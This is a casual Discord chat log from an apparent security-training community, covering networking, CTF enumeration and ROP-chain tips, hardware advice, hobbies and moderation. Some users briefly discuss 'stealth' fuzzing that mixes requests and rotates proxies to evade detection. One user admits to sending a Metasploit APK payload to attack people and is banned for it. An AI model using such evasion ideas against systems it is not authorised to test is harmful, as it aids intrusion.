#quiet-conversation

1 messages · Page 51 of 1

burnt night
#

DDoS is unethical

#

Unethical discussions are against the rules here

golden bridge
#

oooo

#

i see..my bad😅

golden bridge
radiant jacinth
#

👀

frail rapids
#

What's the networking based reason for an ack instead of an immediate HTTP response?

#

Does it have to do with OSI layers (transport and application specifically)?

#

or is for situations when a server might be processing a request for a long time and wants to make sure that the client knows that it did receive the request

#

so for differentiating between server unreachable vs request timeout

solar moat
#

‘Caus the protocol says that tcp segments transfering data must be acknowledged to insure reliability (Not sure to have understood the question well)

twin ridge
#

the HTTP packet is generally built on top of the TCP packet

#

TCP assures the transport of the HTTP

#

the ACK is there to tell the requestor that the packet has been received, don't bother resending it

frail rapids
#

Ahh like that

twin ridge
#

but yes, it's an OSI thing 🙂

short elk
#

tcp/ip thing* 😉

twin ridge
#

well, yeah

#

but you're transporting HTTP on TCP over IP

radiant jacinth
#

?membercount

south inlet
gray jetty
south inlet
ripe haven
warm peak
# ripe haven <@272707328455999488> Wanna make this too? xD

there is a reason to why it is behind, discord does not like when something updates all the time and limits how much you can do, therefore to not make the bot slow with the commands it will update slower and be behind with the member count and then be able to do commands a lot

old otter
#

after completing the web fundamentals/cyber defense paths will i be well equipped enough to make my own entry-level vulnerability web scanner for defensive purposes?

arctic elk
#

To make such a tool you will need to have some sort of programming/scripting language experience. Those paths that you listed aren't quite designed for that.

old otter
#

hmm yes thats why im asking im doing django/ruby on rails and i would like to make some stuff for it relating to cybersecurity but i dont know enough about cybersecurity to even know where to start

#

hence why im here xd

radiant jacinth
#

Totally accurate. I can take it once more but I'm going to do it after I go through C Dev Fundamentals

#

See how much I grow creepypog

lapis swift
#

Hi

frail rapids
burnt night
sleek ivy
#

had to try it out. did not expect that 😅

proven quiver
#

👀

frail rapids
#

Shows that I haven't implemented prod code yet lmao

#

never made any custom modules or unittests :d

frail rapids
#

LMAO WHAT

#

this site is so broken I've literally made two programs in C (I did some RE though)

radiant jacinth
radiant jacinth
radiant jacinth
#

?membercount

burnt night
radiant jacinth
#

no

burnt night
#

We don't have a bot here that uses that prefix, are you using a custom client or something?

radiant jacinth
#

yeah

soft pier
#

it could also be a weird way to ask the question of how many members there are.... that might be common in places where they place a symbol at the start of questions and end

#

like spanish for example

#

never mind.......

burnt night
# radiant jacinth yeah

Do you know that's against the Discord terms of service and they can close your account for that?

radiant jacinth
#

ohk

#

sorry

torpid veldt
#

Also isn't the member count at the top of the channel list anyway

burnt night
#

Yep...

radiant jacinth
#

@burnt night sorry

torpid veldt
burnt night
soft pier
#

it is also possible to view how many users are in here from the discord invite for this discord.... and that is also updated quicker because it is internal discord stuffs

radiant jacinth
#

can I be mod? @terse gorge

torpid veldt
radiant jacinth
#

not funny

torpid veldt
#

Smells like troll in here

radiant jacinth
#

am serious

radiant jacinth
frail rapids
#

wow look guys he has a shady profile picture... he must be a very cool real non-pubescent hacker

#

I wish I could be so cool

#

hmm looks like someone violated rule 1 and rule 3 in my dms

torpid veldt
#

Lol

burnt night
burnt night
charred gorge
#

I genuinely admire some mods for the amount of patience and understanding they have.

meager mason
#

Be specific. Helps me figure out who to target to annoy them.

twin ridge
#

bonks @meager mason

meager mason
#

Ahuh! The first victim has revealed himself.

#

I shall give you the prodding of a lifetime!

twin ridge
#

not if I prod you first!

radiant jacinth
#

i hope my anxiety and scrambled mind doesnt cost me the job interview for a pentesting role tomorrow, i'm moving from a SOC role and i hope i have enough knowledge to make this through

wraith warren
burnt night
#

The complete beginner path is deprecated

wraith warren
#

It's sad because I almost passed it

radiant jacinth
#

Good thing I haven't started burp

patent mural
#

oh, the beginner path is deprecated ? i finished it a couple of weeks ago, doesnt matter that much, the goal is to do all of thm 😄

radiant jacinth
#

Are amd 5000 processes good for virtualbox

half fractal
#

Depends on the model but in general they should be fine

frail rapids
#

Is NFS the unix equivalent of SMB?

serene trench
#

Yeah sorta, but they both have their benefits and use cases too (: @frail rapids

ripe haven
#

This is super random, but is anyone here good with growing plants? Specifically from seeds and peppers.

white zinc
patent mural
#

im about to finish the jr pentester path, wondering what to start next, offensive or defensive path, what is more fun ?

frail rapids
#

Imo defensive is more theory while offensive is more hands on

#

Hence, imo offensive is more fun

dusty sleet
#

Everyone saying off is more fun, I doupt def isn't fun as well

frail rapids
#

What's the best way to get better when you have all the basics? I feel like I'm mediocre at everything (binexp, RE, enum, webexp, et cetera) but don't know how to improve

#

Some blog posts are too complicated whilst others are too basic

dusty sleet
ripe haven
#

@final gulch CONGRATS ON SANS COURSE!!!!!!!!

final gulch
hoary vale
#

Any mods around that can give me the Security+ role? 👀 (Edit: Fluff got it, thx Fluff!)

burnt night
hoary vale
dusty sleet
#

@burnt night ayy yo,how come your name is james while you are only one dude 😩 ?

tawdry dove
#

Because that's not how English works?

#

You need the ' for there to be multiple

soft pier
#

canned beans would like a word

tawdry dove
#

So James' would mean there are multiple James

#

Or you use that to refer to something that is theirs

soft pier
#

james's icecream???

spark sun
tawdry dove
#

Yee I said that but not as eloquently

#

The something that is theirs

spark sun
#

This is a party of Jameses in the apartment belonging to James. It's the James' Jameses jam.

frail rapids
#

How will you know what the target is in challenges like binexp? eg sometimes its dropping a shell sometimes its just hopping to a diff function

burnt night
frail rapids
#

Hm aight

twin ridge
burnt night
jaunty grail
#

I'm trying to find a .git file infrastructure online but i can't find anything. Am I using the wrong term?

jaunty grail
#

Like the file repository I mean.

#

I should have just made a local one at this point.

ripe haven
#

@primal steppe do you recommend Anova sous vide machines? If so do you have a specific model you recommend?

primal steppe
#

Does awesome

ripe haven
primal steppe
#

How many watts?

ripe haven
spark sun
#

I think that's the sous vide machine I have, as well

tawdry dove
#

I have the now Beeville Joule

#

It's great

frail rapids
#

Is there a website that collects blogs etc from the web?

burnt night
#

Google does it well.

frail rapids
#

so you can e.g. filter by kernexp and it'll show kernel exploitation blogs, but like, properly unlike google so e.g. thumbnail, description etc

frail rapids
spark sun
burnt night
#

Proper search engines are a real pain to set up

tawdry dove
#

Yep, it's why Google is so dominant

#

They're vertically integrated so it's easier but still difficult

dry pewter
#

Hey Moose

tawdry dove
#

Hi

dry pewter
#

How’s it going?

tawdry dove
#

Tired

dry pewter
#

Yeah…. I can relate.

radiant jacinth
#

Unfortunately i need money, warehouse or tryhackme??

frail rapids
regal jetty
#
#

symbolhound.com if you want to find programmer blogs about specific non-dictionary-word stuff

also /r/hnblogs

red field
#

heyo

serene harness
#

I'm very quite, I like this.

south inlet
finite vector
#

I wonder if this matches the purple

tranquil kraken
#

how's everyone doing c:

loud dawn
red field
#

suggest some rooms

tall saddle
#

Ah rolling release, how I love you so. "what do you mean I need to upgrade my postgresql database to keep using Metasploit?". And that's how the package got locked in my config to 14.2 after that dramatic upgrade procedure thought

#

Honestly wouldn't have it any other way. Now I know how to upgrade a postgresql database and know to lock my package version so I never have to do it again :p

winged rain
#

If I was on a shared network with someone up to no good, what else could they realistically do other than intercept my data through MITM.

frail rapids
#

Does anyone have tips for web "exploitation" in CTFs? enum specifically

#

its always some stupid parameter or file I fail to find because I use wrong wordlists, forget things, etc

signal hull
#

Depends on the event honestly. In my opinion, a good CTF web challenge, unless the challenge is about enumeration, should make all of the endpoints relatively easy to find. The challenge should be figuring out how to put all of the puzzle pieces together, not finding the puzzle pieces in the first place. (assuming we're talking standalone CTF events and not boot2root)

#

If you're referring to stuff like HTB/THM machines, then I don't really have any good advice because I still need to get good at that kekw

quaint basin
#

They shouldn't be made easy to find -- but neither should they be made ridiculously hard to find. They should be built in a realistic manner, making them as easy or as difficult to find as the context demands

signal hull
#

That's what I meant, I just worded it in the opposite way 😅

#

I also don't necessarily think that a good CTF challenge has to be realistic. I think some of the best ones do end up being the most realistic, but there are also a lot that are just as rewarding learning-wise despite not being "realistic". (but that's another conversation to be had tbh)

signal hull
tranquil kraken
#

hello

short elk
# frail rapids its always some stupid parameter or file I fail to find because I use wrong word...

using the wrong wordlist (not from any of the “usual” ctf wordlists) is just a cruel thing from the creator (if finding via dirbusting is the intended method).

forget things? that’s on you. create/modify a checklist of everything. something not on your checklist? add that check in for next time (ie. try every http verb on an endpoint)

stupid parameters? also should be included in checklist. fuzz params for file names, common words, special characters/strings

quaint basin
#

using the wrong wordlist (not from any of the “usual” ctf wordlists) is just a cruel thing from the creator (if finding via dirbusting is the intended method).
Assuming there isn't a giveaway elsewhere.
If you're using some obscure (but documented) CMS with unusual endpoints then that's fine -- it won't show up in your wordlists, but you can use the docs to generate one specifically for the box 🤷‍♂️

kind palm
#

hello can you help me?

#

Perform an Xmas scan on the first 999 ports of the target -- how many ports are shown to be open or filtered?

#

what is the IP address of virtual machine?

south inlet
#

Did you start the machine?

kind palm
#

yes

kind palm
south inlet
#

The ip should be up the top

kind palm
#

thank you I saw the IP address but when I do some scan answers do not match or maybe I fill in the wrong answer so I need help on some questions

kind palm
# south inlet

thank you I saw the IP address but when I do some scan answers do not match or maybe I fill in the wrong answer so I need help on some questions

hoary nymphBOT
#

Gave +1 Rep to @south inlet

kind palm
deft fossilBOT
burnt night
valid python
#

@fervent glade Could you share your link with me when the king of the hill starts. I'd like to spectate you

deep rain
#

quiet kid

ripe haven
#

@smoky mortar I think I found a problem with a new room, may I PM you? (It's something I think should not be posted publicly)

charred gorge
#

Your boy just donated blood. I'm 500ml lighter now coolguy

charred gorge
#

I had this really sweet, babushka of a nurse taking care of me.
So she obviously had to chat me up, asking me what I'm studying and what I do. I obviously replied that I study cybersecurity.
And she stopped for a second, looked and me and said "I have no idea what that is. But go on!" hahaha

#

So I tried to briefly explain to her what cyber attacks are, using the ongoing war in Ukraine as an example. And I told her that people like me are basically like hackers, but the good guys!

#

And it was so sweet. It made my day blobheart

regal jetty
#

I wonder if there's a decent analogy to be made using the immune system

charred gorge
regal jetty
#

Oh for pen testing? Yeah, or maybe an allergy panel is vuln detection and vaccination is security patching lol

#

I was picturing a blue team as the immune system and a red team as pathogens I guess
except probably with slightly more creative adaptations to each other

charred gorge
# regal jetty Oh for pen testing? Yeah, or maybe an allergy panel is vuln detection and vaccin...

That's a fairly good comparison too!
The analogy I often use whenever someone has absolutely no idea what penetration testing is, I simply compare pentesters to bank robbers.
I tell them to imagine a world where banks would hire teams of bank robbers to perform a mock robbery and tell the bank what their weaknesses were. After this "robbery" the robbers would write a nice report on how they performed the robbery, what weaknesses of the security systems they used, and would tell them something like "Hey, you need an extra guard here", "Don't leave that door open and make sure only authorised personnel can go through", "While you're at it, buy new reinforced doors with better locks".
All this effort to make sure the bank is safer in case of a real robbery.

spark sun
charred gorge
# spark sun This is actually a real thing that banks do. As a hypothetical, it definitely ha...

Oh yeah? That's interesting because I haven't heard about it, but somehow I'm not even surprised. Are those people mostly former bank robbers, or just specialists who study the methods used by robbers?
Because in my analogy I wanted to put the emphasis on the ethical side of it. That technically, by studying to become a pentester, it's pretty much like studying to become a robber, the main difference being that you decide to do it ethically.

spark sun
charred gorge
#

Wow, that's cool.
So it's kind of like being a social engineering vuln researcher. Right?

spark sun
#

Not.... really. Every engagement is different, and each engagement is likely to put different sets of controls in scope. It's like any pentest contract.

charred gorge
#

Okay, I see. When you said limits if procedure, I thought you're strictly talking about abusing the procedures in a social engineering way

#

But I get it now

frail rapids
#

Do y'all use wfuzz for non-directory web fuzzing?

short elk
#

i use burp, but on the command line i’d use ffuf

wind sorrel
#

this is perhaps a dumb question, but how do applications use different languages and frameworks, e.g. a webscraper using python, how would I then display it using java

burnt night
#

Something like JSON or XML is commonly used to interface different things over the network, but there's lots more

cold tendon
#

hey

charred gorge
#

Hello

radiant jacinth
#

Why use man page if Google is faster??

serene trench
#

cause sometimes you won't have access to google @radiant jacinth

radiant jacinth
#

I disagree, that should NEVER happen lol (but yes I do know how to use man pages)

serene trench
#

you can disagree but it's true

#

ever had no wifi before?

radiant jacinth
#

Oh... gg

quaint basin
#

Then again, I have literally installed tools on my box connected to a client network before to see if their SOC noticed, sooooo

south inlet
quaint basin
#

TL;DR: I literally told the client to fire the subcontracted SOC, but for obvious reasons I ain't going into any detail :)

tall saddle
#

Is it silly that I’ve never really made the connection between video game and console exploits and more general infosec until recently? Of course I’ve seen fail0verflow CCC videos and “oh do these things to execute arbitrary code” in Ocarina of Time speedruns. As someone who’s huge into emulation and console homebrew, I always categorized it as helpful tools in my brain until looking at it more critically from infosec standpoint and getting into reverse engineering. They’re not often malicious after all from the consumer’s prospective so didn’t register with me in quite the same way despite my fascination with both

signal hull
#

I only recently learned about the Stop n Swap Paper Mario speedrun where you use a buffer overflow (iirc, might have been a different type of exploit) to get code execution and trigger the ending cutscene

tall saddle
#

Yep it may have been literally that exploit that caused me to rethink things a bit, I’ve seen some impressive arbitrary code execution in SMW and many others but getting one game to do so to another is stunning

signal hull
#

It is beautiful how game hackers do their thing

tall saddle
#

I’m watching the TechRules video on game/console exploits from about 6 months ago, just took hearing arbitrary code execution again after learning infosec put things in a new light, but yeah idk why I’m surprised. I interact with emu devs and game reverse engineers often, just didn’t click with me “oh this is literally the same skillset” lol

#

Even followed Paper Mario glitch videos lol, guess I missed it when it was new. Thanks YouTube

signal hull
tall saddle
#

Very interesting, thanks! Honestly once I learn reversing and debugging a bit better, I’d love to circle around to ROM hacking. Already have a good bit of experience with pre-made tools, but would be interesting to dive deeper or getting into memory analysis with cheats. Just kind of opening new doors for me now that my infosec interest are getting into reverse engineering when that’s like most of my fave projects lol

signal hull
#

Reverse engineering is the absolutely best/worst thing ❤️

tall saddle
#

Yeah I’ve read many writeups and looks like painstaking work. Especially getting into the lowest level ASM side, that may be a bit much for me generally but we’ll see lol. I always found it fascinating but didn’t have the fundamentals to get started until THM and infosec

#

I’m eagerly awaiting the reverse engineered port of LucasArt’s Jedi Engine (Star Wars: Dark Forces, Outlaws), and have been using OpenJKDF2 for my most recent Star Wars: Dark Forces II play-through. Those are a bit more niche but yeah projects like OpenRCT2 for Rollercoaster Tycoon 2 are things I’m all about. While yeah we’re generally analyzing malware in infosec, once I started getting into IDA, Ghidra, and such that I was like “Ohhh” lol

boreal socket
#

Hey so im doing sudo apt install john but it keep giving me john 1.8.0 and the latest one is 1.9.0. And i have upgraded the packages

tall saddle
#

Ubuntu is not what we'd call rolling release. Once the final versions are decided and tested for a Ubuntu or Debian release, then those packages are basically set in stone with no new features. Only security updates. It's likely you're on a Ubuntu/Debian based distro which is following this principle. PPAs (custom Ubuntu repositories) can help resolve this, but they're not official for Debian based

dull dove
boreal socket
frail rapids
#

Are there tools that do stealth fuzzing? as in, mix invalid and valid requests to make it look more legit

#

I'm especially talking about dirbusting (not that I'd need a tool for that, but I can imagine red teaming pentesters would need it to avoid detection)

dusty sleet
frail rapids
#

Isn't it atleast less obvious when you're filtering malicious users out of normal users?

#

hmm yeah, wouldn't need proxychains though

#

Just iterate through a proxy list file in the program

quaint basin
#

Assuming you're watching for that

#

Not sure how common that would be

spark sun
#

I think it's question of how common relative directory traversal is in the system as a whole

dusty sleet
quaint basin
frail rapids
#

Probs wanted to work at gov kekw

quaint basin
#

Naw, if I see a job requiring me to have that cert I'm walking away 😆

dusty sleet
#

Del varg

quaint basin
# sleek ivy to india?

From India -- that's the only place they seem to really like it these days, for some very stupid reason

frail rapids
#

Don't know if I'm allowed to ask this, but does anyone know how youtubers like Jim Browning manage to track those scammers down? I imagine he only has an IP address of the scam office (based on the teamviewer connection or whatever)

#

and manages to identify scammers and get camera footage, which I doubt is even possible (aside from ip cam default creds which need to be portforwarded)

tawdry dove
#

Idk who you're talking about but it's probably staged

spark sun
#

A lot of if is the cyber version of what a private investigator does. Many of those activities are in a grey area at best, and I wouldn't recommend trying it out for yourself without getting a reputable lawyer specializing in cyber law to look over your scope and activities.

#

Jim Browning is legit. He's dedicated to exposing scammers to legal consequences where possible. When there are legally actionable items in play, he delays videos and censors them so as to not pollute or contaminate the case.

#

He's also worked with UK and Indian law enforcement and helped the BBC make an expose as well.

honest sluice
#

yeah I definitely like jim browning

frail rapids
#

Ah alright

frail rapids
#

Was just curious about the techniques

tawdry dove
#

I see

#

I keep on getting those scam things recommended and they all looked staged or were conducted in an extremely grey way, so I assumed

spark sun
#

Many of them are staged, or re-enactments. If you see grey or black behavior, it is usually staged. Not all though, and the latest Mark Rober scam payback video has me questioning some things

tawdry dove
#

Yeah i saw that too in the recommendations. I didn't click because it seemed staged. Dude is too nice/straightedge to do anything real

frail rapids
#

Well he did do a collab with jim browning 🤷‍♂️

#

but yeah, tbh I was thought it was staged as well

fringe raven
#

Hi guys, hope you all have a great day🙌

#

May i send you i short dm @burnt night ?

burnt night
fringe raven
burnt night
fringe raven
burnt night
fringe raven
azure trench
#

It's been a while. I've been busy at grad school, but we have summer break now, so hopefully I can do some THM stuff a little bit. Here's is some steak and grits I cooked some time ago. I meant to share it here.

serene trench
mortal venture
#

Anyone know any good recommendations for laptops? I know what to look for in desktops but still have yet to see any solid info on laptops. Since this site has multiple experienced people dedicated to pentesting I figured this would be a near full proof place to ask, for recommendations or at least tips on what to look for

#

I don’t imagine desktop to laptop will be a huge difference in what I should be looking for but just in case I want to ask before making a hefty purchase

#

I especially wanted to ask since laptops aren’t very customizable

#

And I’ll look into xps. Any specific kind or just any from them?

#

I don’t necessarily want customizable, what I meant is contrary to a laptop, if my desktop is lacking somewhere or I want better I can simply improve said aspect, versus not so much for laptops

#

I guess that would mean I want customization 🤨🤔🤔 huh

burnt night
#

If you do need a GPU, XPS are usually available refurb

mortal venture
#

100% personal just to practice pentesting as recently and in the near future I am not at home as much, although I will be getting an apprenticeship here soon

#

So maybe not 100% personal use in the future I guess? Sorry

burnt night
#

Refurb is so much cheaper, and better for the planet which is a nice bonus.
If you get the right models, like my Latitude 5400, you can get a decently repairable laptop for not so much money.
I got an i7 at 4.8GHz and 16GB of RAM for £370

mortal venture
#

WOW xps has a price tag jesus

burnt night
#

Yeah, XPS does

#

Dell has a factory outlet/refurb store too though

mortal venture
#

Literally $500 cheaper thank you. I’ll look into the three recommendations you two gave me thanks for the help 🙂

#

It’s more like $250 average savings but still

burnt night
#

I got mine off ebay

mortal venture
#

eBay huh😬😬

burnt night
#

Also highly recommend reading reviews looking for things like build quality.

burnt night
# mortal venture eBay huh😬😬

If you get good sellers, then ebay is fine.
Lots of businesses sell on Ebay and I have a nice set of UK sellers that I look for stuff from when I need tech.

mortal venture
#

And for laptop use it’s okay to just wipe windows and install Linux correct?

#

I’m fairly certain I can just not sure if that’s the best option

burnt night
mortal venture
#

Oh it is huh. Interesting 😒 thanks

twin ridge
#

they're a bit pricy though

mortal venture
spark sun
#

Why do you want to hack instagram?

#

-undelete -a

burnt night
spark sun
#

ah, yeah, i see now. My app hadn't caught up

#

I thought they were trying to hide shenanigans.

tawdry dove
#

run

fringe raven
#

@burnt night Man i send you a friend request to send my DM

burnt night
#

You don't need to, you can adjust your privacy settings to allow DMs to people who aren't your friend.

fringe raven
#

Because it said you cant dm without it

burnt night
#

I try to keep my friends list as a friends list

brave barn
#

how i send to any one my android app its file name is apk but its lock and when i send it fackbook says that is virus file

rugged frigate
#

why do you want to send an apk to another person? You can just tell them where you got it from if it's publically available and from a trusted site.

Though if Facebook says it's malicious then I'd rethink to send it to anyone. Especially if it's custom written with bad intensions in mind.

burnt night
#

@brave barn Are you trying to send a reverse shell over Facebook?

brave barn
#

no

burnt night
#

You generated a payload with metasploit right? An APK?

brave barn
#

yes

burnt night
#

And you're sending trying to send it over Facebook?

brave barn
#

yes

burnt night
#

Are you trying to attack people by sending them this apk?

brave barn
#

you have your facebook i sen you picture . yes yes you right

burnt night
#

-ban @brave barn Trying to send malicious APKs over Facebook to attack people. Blackhat.

hoary nymphBOT
#

🔨 Banned abdulghani#5893 indefinitely

winged rain
#

Can't believe the interaction above is real

rugged frigate
#

gottem

quaint basin
#

That is impressively stupid smh

charred gorge
#

I just assume people like that are always trolling, and I know I'm wrong.
But those who don't - I always wonder why do they always act so... Weird? Every single time.

twin ridge
wanton iris
#

That's. Quite the conversation

charred gorge
#

That's quite a quiet conversation

mortal venture
#

Sorry to be a bother I just want to make sure as it’s a hefty purchase. Is 4 cores for a laptop a good amount for pentesting?

#

I normally just make a VM on my desktop and toss 8 of my cores at it, never paid it any attention past that really

#

I feel like 4 is plenty and I’m overthinking this🤔

#

If I’m running a VM on it then I would have to run maybe 2 cores in the VM I would imagine, unless I feel comfortable making kali my host OS

#

I just remember when I first built my desktop on a whim I messed a ton of things up and don’t want to do that again with my laptop

spark sun
#

If I'm running a linux guest with a desktop, I usually give it 2 cores and 3-4GB of RAM. If it's headless, I usually run 1 core and 2GB or less of RAM.

mortal venture
#

O

#

Huh. Thanks for the info🤔

tawdry dove
#

You also have to remember that the host still needs resources too

tall saddle
#

Yeah my two core, 4GB RAM terminal only dedicated pentesting virtual private server is honestly kinda overkill for my needs like 95% of the time

#

I should have known that doing minimal Linux for years, but wasn't sure about pentesting headroom

frail rapids
#

If using burpsuite pro with scanner I recommend atleast 16GB

#

I'm on the fence about wether I want to upgrade my desktop to 32GB

burnt night
#

I did it, I haven't looked back since fixing the ram clock issues

#

We run 32 at work too, it's nice

twin ridge
#

64 better

frail rapids
#

I've been considering an upgrade but I have a 2017 motherboard so if I want a reasonable high ram size and speed I need to upgrade my entire system (old cpu socket etc)

burnt night
tawdry dove
#

What do you mean?

winged rain
tawdry dove
#

Where did your message go?

#

It's probably easier just to use file explorer

spark sun
#

obsidian has a sync option

#

not sure if you can point it to anything other than cloud though

tawdry dove
#

Yeah, the original message said offline

spark sun
#

you could put the file structure on onedrive or a another cloud service sync

winged rain
#

I just have to fix my pooter so it can access wifi again

fringe scroll
#

q u i e t

dusty sleet
#

0day fb account is my favourite fb moms quotes account 🤣

radiant jacinth
#

Shhhhhh quiet

ripe haven
golden crag
#

anyone expert in linux here ?/'

burnt night
#

If you have a question that you're looking for answers to, make sure you've researched it first. Then just ask the question directly. No one knows if they can help until they know the question

golden crag
dull dove
#

Just ask your question.

dreamy kayak
short elk
#

anyone here track what countries they’ve been to in a cool way?

#

i just currently have a world map and pin them, but i wanna do all of europe and this place is so tiny so i’d wanna just get a europe map but there’s gotta be cooler ways than just pinning it

tawdry dove
# short elk i just currently have a world map and pin them, but i wanna do all of europe and...

I've been thinking about how to do this myself as I think I've crested double digit countries. I've seen scratch offs, LED matrices, the pins, and aviation sectionals. One thing that I saw yesterday was a map with each countries traditional style of coffee. This was at a coffee shop but could definitely be modified to fit the visited countries. Also, get to try a bunch of coffee lol

#

One thing I have started doing for the US national parks is going to the visitor center and getting a magnet, a patch, and a coffee cup. Magnet i stick on the fridge, patch i put on the roof the car, and the coffee cup i either shelve or drink out of depending on the material.

#

Costs about $30 a park

short elk
#

oo scratch off maps look pretty cool, might go for one of them

#

i’ve also got different souvenirs from each country i’ve been too which sucks, i think i want to get the same thing from each country - like you do moose

#

not sure what i wanna do though

#

also gonna do everything again, regardless if i’ve already been there when i do get the scratch off

burnt night
short elk
#

that’s a good idea too, seeing as i’ll be doing them all again i could get decent photos

#

this seems like a decent breakup of countries i can do in different trips

tawdry dove
#

Could get nerdy and do a SIM or something lol

short elk
#

what’s that?

burnt night
#

Sim card

tawdry dove
#

Like a SIM card

short elk
#

ohhh lol

radiant jacinth
#

@quaint basin, I saw you created the "upload vulnerabilities" room. I find it interesting that it asks the user to set an entry in the hosts file with multiple subdomains pointing at the same IP. I guess that was a way to offer multiple challenges without having to create multiple VMs, right? May I ask how it was done? (Something with Nginx perhaps?)

#

Thanks lassi!

hoary nymphBOT
#

Gave +1 Rep to @twilit nacelle

quaint basin
#

The implementation there is a lot sloppier than I would use now, but it works 🤷‍♂️

radiant jacinth
#

even more reason to learn about containers!

#

cool thanks for sharing that info!

quaint basin
#

Yeah, containers are absolutely awesome. Love them

twin ridge
#

They are!

dusty sleet
#

Containers of anything chocolate are my favourite

serene trench
#

I'm proud

spark sun
#

toolbx is the most useful container

ripe haven
#

@warm peak may I DM?

warm peak
#

sure

quaint basin
serene trench
#

swings and roundabouts Mr. Muiri 😎

lusty locust
#

Is there a way to work around encrypted PDF file without using Acrobat Reader? (password protected)

#

By changing Windows Permissions, etc

#

When I right click on the .PDF file to read it with Notepad++ it's for the most part coded and unreadable.
But there is definitely some code logic in there.

merry bramble
still blaze
#

Hey there! Is anyone in here able to read Persian text?

burnt night
merry bramble
still blaze
hoary nymphBOT
#

Gave +1 Rep to @merry bramble

merry bramble
#

I can try, I know the arabic numbers and they're very similar

#

Although I have to head out in a minute

merry bramble
hoary nymphBOT
#

Gave +1 Rep to @merry bramble

ripe haven
#

Yoo! I got a problem with my VBox (Latest update) booting into grub/uefi on my parrot os installation, the problem started when my VM crashed (I overloaded it), anyone know a way to fix it? Google wasn't very helpful and it seems to be a common problem.

winged rain
#

I'm officially stupid

#

I can transfer files with a usb without the need for any kind of wifi

winged rain
ripe haven
#

@gray jetty I blame you.

ripe haven
gray jetty
#

you do deserve it tho

ripe haven
south inlet
#

I always snapshot my VM's

#

And for good measure, I clone it, then move it to an external.

ripe haven
#

It’s crazy corrupt rn haha

dim gazelle
#

Yo guys

#

What is up

gray jetty
dusty sleet
#

Many people don't know this but holding control while using the arrow keys will allow u to move 1 word each time,likewise to delete a full word hold the alt key while using the arrow key (in terminal)

hoary nymphBOT
#

Gave +1 Rep to @dusty sleet

unique compass
#

Hi everyone

merry bramble
formal mural
tawdry dove
#

I thought control - k was hyperlink?

dull dove
#

ctrl + k removes all text from cursor to eol in linux

#

ctrl + k in a browser is used to focus on search bars

spark sun
#

pay special attention to the history expansion section

tawdry dove
#

I didn't see that this was for terminal whoops

dull dove
tawdry dove
#

Yeah

serene trench
#

-ban 327156963785965568 -ddays 1 nsfw discord invite

hoary nymphBOT
#

🔨 Banned 327156963785965568 indefinitely

twin ridge
#

James got it but didn't ddays

solar robin
#

hi

dusty sleet
#

for my arab audience
this song slaps

#

لإقعدلك عالدرب قعود | حلوة يم عيون السود
كلمات الفنان كاظم الساهر
نسخة ريمكس توزيع أحمد حمود

Original song by :
Kadim Al-Saher

Remixed by :
Ahmad Hammoud

Performed by :

Alaa Wardi
Wonhochang
Zeina Aftimos
Munsef Turkmani

Thanks for them.

#لإقعدلك_عالدرب_قعود #Oyoun_Soud

▶ Play video
toxic tusk
dusty sleet
#

hello

#

I think Ive pinged u by mistake sorry

dusty sleet
#

question : how does one use metasploit in an actual engagment , I am talking especially about saving the information one gathers in suitable databases ,setting up dedicated listening servers , c2 etc, is it suitable for a red team or is there a better tool for the job

scarlet moth
#

I mean red teams do use it, not too different than how you might use it, there are also other tools tool that may be used

burnt night
#

There's lots of C2 options

dusty sleet
#

I've read metasploit unleashed in the past, I don't think I've read any extensive part on this context, can somone recommend me a good red team book that discussess this topic

burnt night
#

This channel isn't for room related stuff

frail rapids
#

Sheeesh rop chains are hard man

#

I'm currently doing ropemporium challenges and am already slamming my head into my desk at challenge 4/8

#

Does anyone have general tips with regards to rop chains? I'm personally struggling with finding the right instructions even though I'm using ropgadget for retrieving gadgets

merry bramble
#

For most of the ROPEmporium stuff, the first place to look is in their usefulgadgets and usefulfunctions areas

#

are you using pwndbg? or ropper?

#

(or ropper within pwndbg?)

frail rapids
#

Nope, just rabin2 + ropgadget + raw gdb + ghidra

merry bramble
#

I'd definitely use pwndbg or gef, I prefer pwndbg

#

ropgadget is good too, but I usually get more parsable results from ropper (except within pwntools, where it's kind of meh)

#

are you doing the 32 or 64 bit? I only did the 64 bit versions of all but the first one

frail rapids
#

I'm currently doing 32 bit to practice rop concepts

#

am probably going to switch to x64 if I finish all challenges in x86

merry bramble
#

I get the philosophy there, but there's a pretty big leap there because of the way that arguments are passed in most functions now with the 64 bit architecture. You move from having to fill a lot of registers instead of loading the stack with the variables. So the rop chains you use in 32 bit aren't going to be very usable in the real world

#

but I mean whatever helps you learn has value, I'm not dissing on it

#

there's also 32 bit embedded systems out there (although less of them are using x86 these days)

#

As far as tips go, I guess the best I could offer is to write out what your final function call is going to look like, and work back from there. Which registers have to hold which parameter, etc. And then find ways to get the data there working backwards.

frail rapids
#

Hmmm those are some pretty good tips. Thanks

merry bramble
#

No problem 🙂 Happy hunting!

novel blade
tawdry dove
#

Was that you? @novel blade

novel blade
#

Not it was not me @tawdry dove I am new here and was wondering what did the user do for an "indefinite ban".

spark sun
#

Violated server rules

#

Just read the #rules and you'll be fine 🙂

novel blade
#

Is it ok to discuss THM technical stuff from the exercises/quiz/CTF ?

spark sun
#

In appropriate channels, yeah

novel blade
quaint basin
novel blade
#

What can be NSFW ? People can DM I suppose and invite/network ? or is that also banned ?

spark sun
#

Follow the server rules; they are pretty clear.

vocal ridge
#

Yeah that's a bit ridiculous

#

Ain't no time for that

quaint basin
vocal ridge
#

Lewd dumping 😎

#

Like bro... Lol

mortal venture
#

Anyone have any discord channels I can join that teach about starting 3d modeling?

frail rapids
#

Might wanna check out blender discord server

tawdry dove
#

Blender, Maya, Autodesk, etc. Plenty of resources on YouTube

frail rapids
#

Oh wow another person who watches mentaloutlaw

burnt night
#

We try to keep away from all that tinfoil hat nonsense here, please.

#

No, I will never buy into the conspiracy theory shit.

pine iron
#

I'm so terrified of buffer overflows, anyone got pointers for me before i start trying to learn them?

burnt night
#

BOF isn't something to be scared of, but it builds on some fundamental topics from the CompSci field

pine iron
#

thank you 🙏

frail rapids
#

Makes you really understand how buffer overflow vulns work and it's a good prep for rop chains etc

burnt night
pine iron
burnt night
pine iron
#

Would there be a room for it on THM? If not, any good search terms / specific resources yk of?

burnt night
tawdry dove
#

@pine iron this is the book

pine iron
tawdry dove
#

I haven't read it nor do I own it. But it's juuns recommendation for computer architecture

#

So I'd assume it has some level of math

spark sun
#

Depends on what you mean by math. And it's how computers work, you can't really get away with running from math if you want to actually learn something of value in that field.

dusty sleet
#

Hello people of hats 👋

I have a question, in your professional opinion, are you biased to saying that windows is more secure than linux or the other way around according to the following scenarios:

